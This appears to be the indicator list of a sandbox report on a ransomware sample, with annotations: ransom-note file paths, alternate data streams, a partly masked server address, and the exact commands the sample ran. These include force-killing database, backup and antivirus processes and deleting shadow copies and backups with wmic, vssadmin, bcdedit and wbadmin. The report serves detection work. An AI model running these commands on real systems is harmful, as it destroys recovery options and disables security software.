Technical Information
- <Drive name for removable media>:\archer.avi
- <Drive name for removable media>:\hypothyroidism_slides.pptx
- <Drive name for removable media>:\sdksampleprivdeveloper.cer
- <Drive name for removable media>:\contosoroot.cer
- <Drive name for removable media>:\contoso.cer
- <Drive name for removable media>:\sdksampleunprivdeveloper.cer
- <Drive name for removable media>:\dashborder_120.bmp
- <Drive name for removable media>:\dashborder_144.bmp
- <Drive name for removable media>:\dashborder_96.bmp
- <Drive name for removable media>:\dial.bmp
- <Drive name for removable media>:\coffee.bmp
- <Drive name for removable media>:\dialmap.bmp
- <Drive name for removable media>:\default.bmp
- <Drive name for removable media>:\toolbar.bmp
- <Drive name for removable media>:\000814251_video_01.avi
- <Drive name for removable media>:\correct.avi
- <Drive name for removable media>:\join.avi
- <Drive name for removable media>:\split.avi
- <Drive name for removable media>:\indogerman2010.pptx
- <Drive name for removable media>:\stoc13_ml_quoc_le.pptx
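- System Restore (SR) (a Windows recovery feature; the heading stating what the sample does to it is missing from this page, but the shadow-copy and backup deletion commands further down suggest it is disabled or otherwise interfered with)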
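- '<SYSTEM32>\taskkill.exe' /F /T /IM wxServer* (`/F /T /IM <pattern>*` force-terminates every process whose image name matches the pattern, together with its child processes; the patterns in this list cover database, accounting, backup, sync and security-product processes, behaviour usually mapped to MITRE ATT&CK T1489, and each pattern appears again below as a `cmd.exe /C taskkill …` command line, apparently the parent invocation)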
- '<SYSTEM32>\taskkill.exe' /F /T /IM Intuit.QuickBooks.FCS*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBIDPService*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sqlbrowser*
- '<SYSTEM32>\taskkill.exe' /F /T /IM RTVscan*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Culserver*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sqladhlp*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sqlagent*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Sqlservr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SavRoam*
- '<SYSTEM32>\taskkill.exe' /F /T /IM ccSetMgr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM ccEvtMgr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM wrapper*
- '<SYSTEM32>\taskkill.exe' /F /T /IM ONENOTEM*
- '<SYSTEM32>\taskkill.exe' /F /T /IM fbserver*
- '<SYSTEM32>\taskkill.exe' /F /T /IM fbguard*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Simply.SystemTrayIcon*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SimplyConnectionManager*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBCFMonitorService*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sqlwriter*
- '<SYSTEM32>\taskkill.exe' /F /T /IM msmdsrv*
- '<SYSTEM32>\taskkill.exe' /F /T /IM tomcat6*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQLFDLauncher$SHAREPOINT*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQLFDLauncher$SBSMONITORING*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$SHAREPOINT*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$SBSMONITORING*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$MICROSOFT##SSEE*
- '<SYSTEM32>\taskkill.exe' /F /T /IM msftesql-Exchange*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQLServerADHelper100*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MySQL57*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
- '<SYSTEM32>\taskkill.exe' /F /T /IM FishbowlMySQL*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SQLAgent$VEEAMSQL2012*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$VEEAMSQL2012*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$MICROSOFT##WID*
- '<SYSTEM32>\taskkill.exe' /F /T /IM dbeng8*
- '<SYSTEM32>\taskkill.exe' /F /T /IM dbsrv12*
- '<SYSTEM32>\taskkill.exe' /F /T /IM vmware-converter*
- '<SYSTEM32>\taskkill.exe' /F /T /IM vmware-usbarbitator64*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SQLAgent$SBSMONITORING*
- '<SYSTEM32>\taskkill.exe' /F /T /IM BrCcUxSys*
- '<SYSTEM32>\taskkill.exe' /F /T /IM BrCtrlCntr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM AdobeCollabSync*
- '<SYSTEM32>\taskkill.exe' /F /T /IM axlbridge*
- '<SYSTEM32>\taskkill.exe' /F /T /IM qbupdate*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBDBMgr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBW32*
- '<SYSTEM32>\taskkill.exe' /F /T /IM winword*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Defwatch*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Culture*
- '<SYSTEM32>\taskkill.exe' /F /T /IM supervise*
- '<SYSTEM32>\taskkill.exe' /F /T /IM RAgui*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sqlmangr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM wxServerView*
- '<SYSTEM32>\taskkill.exe' /F /T /IM mysql*
- '<SYSTEM32>\taskkill.exe' /F /T /IM mssql*
- '<SYSTEM32>\taskkill.exe' /F /T /IM msaccess*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sql*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBVSS*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBFCService*
- '<SYSTEM32>\taskkill.exe' /F /T /IM httpd*
- '<SYSTEM32>\taskkill.exe' /F /T /IM fdlauncher*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MsDtSrvr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM java*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sync-worker*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sync-taskbar*
- '<SYSTEM32>\taskkill.exe' /F /T /IM AdobeIPCBroker*
- '<SYSTEM32>\taskkill.exe' /F /T /IM node*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Adobe CEF Helper*
- '<SYSTEM32>\taskkill.exe' /F /T /IM CoreSync*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Adobe Desktop Service*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Creative Cloud*
- '<SYSTEM32>\taskkill.exe' /F /T /IM AutodeskDesktopApp*
- '<SYSTEM32>\taskkill.exe' /F /T /IM acwebbrowser*
- '<SYSTEM32>\taskkill.exe' /F /T /IM mysqld*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBDBMgrN*
- '<SYSTEM32>\taskkill.exe' /F /T /IM ZhuDongFangYu*
- '<SYSTEM32>\taskkill.exe' /F /T /IM GDscan*
- '<SYSTEM32>\taskkill.exe' /F /T /IM fdhost*
- '<SYSTEM32>\taskkill.exe' /F /T /IM wdswfsafe*
- '<SYSTEM32>\taskkill.exe' /F /T /IM 360doctor*
- '<SYSTEM32>\taskkill.exe' /F /T /IM 360se*
- '<SYSTEM32>\taskkill.exe' /F /T /IM InputPersonalization*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SQLAgent$SHAREPOINT*
- %WINDIR%\logs\windowsbackup\wbadmin.0.etl
- %HOMEPATH%\searches\sgoznn-decrypt.hta
- C:\far2\addons\xlat\russian\sgoznn-decrypt.hta
- %HOMEPATH%\voip\sgoznn-decrypt.hta
- %HOMEPATH%\videos\sgoznn-decrypt.hta
- %HOMEPATH%\saved games\sgoznn-decrypt.hta
- %HOMEPATH%\pictures\sgoznn-decrypt.hta
- C:\users\public\libraries\sgoznn-decrypt.hta
- %HOMEPATH%\contacts\sgoznn-decrypt.hta
- C:\far2\addons\colors\custom_highlighting\sgoznn-decrypt.hta
- C:\far2\addons\colors\default_highlighting\sgoznn-decrypt.hta
- %HOMEPATH%\favorites\sgoznn-decrypt.hta
- %HOMEPATH%\music\sgoznn-decrypt.hta
- %HOMEPATH%\links\sgoznn-decrypt.hta
- %HOMEPATH%\downloads\sgoznn-decrypt.hta
- %HOMEPATH%\documents\sgoznn-decrypt.hta
- %HOMEPATH%\appdata\sgoznn-decrypt.hta
- C:\users\public\videos\sgoznn-decrypt.hta
- C:\far2\plugins\align\sgoznn-decrypt.hta
- C:\far2\encyclopedia\tap\sgoznn-decrypt.hta
- C:\far2\plugins\autowrap\sgoznn-decrypt.hta
- C:\far2\documentation\eng\sgoznn-decrypt.hta
- C:\far2\plugins\network\sgoznn-decrypt.hta
- C:\far2\plugins\ftp\sgoznn-decrypt.hta
- C:\users\public\music\sample music\sgoznn-decrypt.hta
- C:\far2\plugins\macroview\sgoznn-decrypt.hta
- C:\far2\plugins\hlfviewer\sgoznn-decrypt.hta
- C:\far2\plugins\proclist\sgoznn-decrypt.hta
- C:\far2\plugins\filecase\sgoznn-decrypt.hta
- C:\far2\pluginsdk\headers.c\sgoznn-decrypt.hta
- C:\far2\plugins\editcase\sgoznn-decrypt.hta
- C:\far2\pluginsdk\headers.pas\sgoznn-decrypt.hta
- C:\far2\plugins\drawline\sgoznn-decrypt.hta
- C:\far2\plugins\emenu\sgoznn-decrypt.hta
- C:\far2\plugins\arclite\sgoznn-decrypt.hta
- C:\far2\plugins\compare\sgoznn-decrypt.hta
- C:\far2\plugins\farcmds\sgoznn-decrypt.hta
- %HOMEPATH%\desktop\sgoznn-decrypt.hta
- C:\far2\plugins\brackets\sgoznn-decrypt.hta
- C:\far2\documentation\rus\sgoznn-decrypt.hta
- C:\users\public\pictures\sample pictures\sgoznn-decrypt.hta
- C:\users\public\recorded tv\sgoznn-decrypt.hta
- C:\users\public\pictures\sgoznn-decrypt.hta
- C:\users\public\music\sgoznn-decrypt.hta
- %HOMEPATH%\sgoznn-decrypt.hta
- C:\far2\addons\macros\sgoznn-decrypt.hta
- C:\users\public\sgoznn-decrypt.hta
- C:\users\default\sgoznn-decrypt.hta
- C:\far2\sgoznn-decrypt.hta
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\sgoznn-decrypt.hta
- C:\totalcmd\sgoznn-decrypt.hta
- C:\far2\addons\sgoznn-decrypt.hta
- C:\users\sgoznn-decrypt.hta
- C:\recovery\sgoznn-decrypt.hta
- <Current directory>\sgoznn-decrypt.hta
- D:\sgoznn-decrypt.hta
- C:\sgoznn-decrypt.hta
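- %TEMP%\boot.sys:tpupnbvzicwro (the `file:stream` form denotes an NTFS alternate data stream attached to boot.sys; this entry and the next three are not shown by a plain directory listing and need `dir /R` or stream-aware tooling to enumerate)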
- %TEMP%\boot.sys:ivrhwmenumbuocvak
- %TEMP%\boot.sys:xbcqjlijd
- %TEMP%\boot.sys:iykxevszimranzpu
- C:\far2\addons\setup\sgoznn-decrypt.hta
- C:\far2\addons\colors\sgoznn-decrypt.hta
- C:\far2\documentation\sgoznn-decrypt.hta
- C:\far2\fexcept\sgoznn-decrypt.hta
- C:\users\public\downloads\sgoznn-decrypt.hta
- C:\users\public\documents\sgoznn-decrypt.hta
- C:\users\public\desktop\sgoznn-decrypt.hta
- C:\users\default\videos\sgoznn-decrypt.hta
- C:\users\default\saved games\sgoznn-decrypt.hta
- C:\users\default\pictures\sgoznn-decrypt.hta
- C:\users\default\music\sgoznn-decrypt.hta
- C:\users\default\links\sgoznn-decrypt.hta
- C:\users\default\favorites\sgoznn-decrypt.hta
- C:\users\default\documents\sgoznn-decrypt.hta
- C:\users\default\downloads\sgoznn-decrypt.hta
- C:\users\default\desktop\sgoznn-decrypt.hta
- C:\far2\pluginsdk\sgoznn-decrypt.hta
- C:\far2\plugins\sgoznn-decrypt.hta
- C:\users\default\appdata\sgoznn-decrypt.hta
- C:\far2\addons\shell\sgoznn-decrypt.hta
- C:\far2\addons\xlat\sgoznn-decrypt.hta
- C:\far2\encyclopedia\sgoznn-decrypt.hta
- C:\users\public\favorites\sgoznn-decrypt.hta
- C:\far2\plugins\tmppanel\sgoznn-decrypt.hta
- from %WINDIR%\logs\windowsbackup\wbadmin.0.etl to %WINDIR%\logs\windowsbackup\wbadmin.1.etl
- from %WINDIR%\logs\windowsbackup\wbadmin.1.etl to %WINDIR%\logs\windowsbackup\wbadmin.2.etl
- %WINDIR%\logs\windowsbackup\wbadmin.0.etl
- %WINDIR%\logs\windowsbackup\wbadmin.1.etl
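- '21#.#.117.26':80 (the octets shown as `#` are masked in the report, so this address, also used in the /gateinfo URL below, cannot serve as an exact-match network indicator)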
- '<LOCALNET>.30.1':135
- http://21#.#.117.26/gateinfo
- ClassName: '' WindowName: ''
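- '<SYSTEM32>\cmd.exe' /C wmic.exe SHADOWCOPY DELETE /nointeractive (deletes Volume Shadow Copies without prompting; together with the vssadmin, bcdedit and wbadmin commands later in this list it removes local recovery options, MITRE ATT&CK T1490, and these command lines are stable process-creation detection points)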
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBIDPService*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sqlbrowser*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM RTVscan*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Culserver*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sqladhlp*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sqlagent*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Sqlservr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SavRoam*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM ccSetMgr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sync-taskbar*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM ccEvtMgr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM ONENOTEM*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM fbserver*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM fbguard*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Simply.SystemTrayIcon*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SimplyConnectionManager*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM BrCcUxSys*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM BrCtrlCntr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM AdobeCollabSync*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM InputPersonalization*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM wrapper*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sync-worker*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM FishbowlMySQL*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$SHAREPOINT*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$SBSMONITORING*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM msftesql-Exchange*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQLServerADHelper100*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sqlwriter*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBCFMonitorService*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM dbeng8*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM dbsrv12*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM vmware-converter*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM vmware-usbarbitator64*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM tomcat6*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM msmdsrv*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MySQL57*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM AdobeIPCBroker*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM node*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Adobe CEF Helper*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sqlmangr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM wxServerView*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM mysql*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM mssql*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM msaccess*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sql*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBVSS*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBFCService*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM supervise*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM wxServer*
- '<SYSTEM32>\cmd.exe' /C <SYSTEM32>\vssvc.exe
- '<SYSTEM32>\cmd.exe' /C vssadmin.exe Delete Shadows /All /Quiet
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /C bcdedit.exe /set {default} recoveryenabled No
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTATEBACKUP -deleteOldest
- '<SYSTEM32>\cmd.exe' /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\cmd.exe' /C wbadmin DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\vssvc.exe'
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Culture*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM RAgui*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Defwatch*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM CoreSync*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM wdswfsafe*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Adobe Desktop Service*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Creative Cloud*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM acwebbrowser*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM AutodeskDesktopApp*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM mysqld*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBDBMgrN*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM ZhuDongFangYu*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM GDscan*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM fdhost*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM 360doctor*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM winword*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM 360se*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM java*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MsDtSrvr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM fdlauncher*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM httpd*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM axlbridge*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM qbupdate*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBDBMgr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBW32*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SQLAgent$SHAREPOINT*